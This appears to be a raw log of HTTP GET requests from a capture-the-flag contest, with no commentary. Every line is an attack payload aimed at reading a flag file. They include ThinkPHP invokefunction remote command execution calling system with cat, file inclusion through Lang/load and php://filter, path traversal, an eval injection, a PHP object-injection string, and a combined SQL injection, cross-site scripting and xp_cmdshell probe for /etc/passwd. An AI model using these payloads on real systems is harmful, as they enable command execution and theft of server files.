GET /?s=index/\\think\\Lang/load&file=/flag.txt
GET /favicon.ico
GET /?file=../../../../flag.txt
GET /?zzz=eval(system(%22cat%20/flag%22))
GET /?flag=cat%20flag.txt
GET /index.php?s=index/think%5capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat+/flag.txt
GET /index.php?s=/Index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cat%20/flag.txt
GET //flag.php
GET /app/common/wormview/Serv.php?path=O%3A4%3A%22Door%22%3A2%3A%7Bs%3A12%3A%22%00Door%00method%22%3Bs%3A5%3A%22mysys%22%3Bs%3A10%3A%22%00Door%00args%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fflag.txt%22%3B%7D%7D
GET /flag.php
GET /?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cat%20/flag.txt
GET /index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat+%2Fflag.txt
GET /?s=index/%5Cthink%5CLang/load&file=/flag.txt
GET /?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=
GET //?s=index/%5Cthink%5CLang/load&file=/flag.txt
GET /flag
GET /flag.txt
GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cat%20/flag.txt
GET /?flag=1AND%201=1%20UNION%20ALL%20SELECT%201,NULL,1,'%3Cscript%3Ealert(%5C%22666%5C%22)%3C/script%3E',table_name%20FROM%20information_schema.tables%20WHERE%202%3E1--/**/;%20EXEC%20xp_cmdshell('cat%20../../../etc/passwd')
GET /?flag=1AND+1%3D1+UNION+ALL+SELECT+1%2CNULL%2C1%2C%27%3Cscript%3Ealert%28%5C%22666%5C%22%29%3C%2Fscript%3E%27%2Ctable_name+FROM+information_schema.tables+WHERE+2%3E1--%2F%2A%2A%2F%3B+EXEC+xp_cmdshell%28%27cat+..%2F..%2F..%2Fetc%2Fpasswd%27%29
GET /index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cat+%2Fflag.txt
GET /index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cat%20/flag.txt
GET /flag,php
GET /?s=captcha&test=cat%20flag.txt
GET /index.php?s=?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cat%20/flag.txt
GET /?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag.txt
GET /?s=index/\\\\think\\\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag.txt
GET /app/common/wormview/Serv.php?path=O:4:%22Door%22:2:%7Bs:12:%22Doormethod%22;s:5:%22mysys%22;s:10:%22Doorargs%22;a:1:%7Bi:0;s:9:%22/flag.txt;%7D%7D
GET /?s=.%7Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cat+/flag.txt
GET //?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag.txt
GET /app/common/wormview/Serv.php?path=O:4:%22Door%22:2:%7Bs:12:%22Doormethod%22;s:5:%22mysys%22;s:10:%22Doorargs%22;a:1:%7Bi:0;s:9:%22/flag.txt;%7D%7D/app/common/wormview/Serv.php?path=O:4:%22Door%22:2:%7Bs:12:%22Doormethod%22;s:5:%22mysys%22;s:10:%22Doorargs%22;a:1:%7Bi:0;s:9:%22/flag.txt;%7D%7D
GET /?s=index/%5Cthink%5CLang/load&file=/flag.txt%20HTTP/1.1
GET /app/common/wormview/Serv.php?path=O%3A4%3A%22Door%22%3A2%3A%7Bs%3A12%3A%22%00Door%00method%22%3Bs%3A5%3A%22mysys%22%3Bs%3A10%3A%22%00Door%00args%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fflag.txt
GET /upload/header.php?key=cat%20/flag
GET /?s=captcha&test=cat%20/flag.txt%20
GET /?s=captcha&test=cat%20/flag.txt
GET /lib/.phpinfo.php?include=php://filter/read=convert.base64-encode/resource=/flag
GET /?zzz=eval(system(%22cat%20/flag%22))%20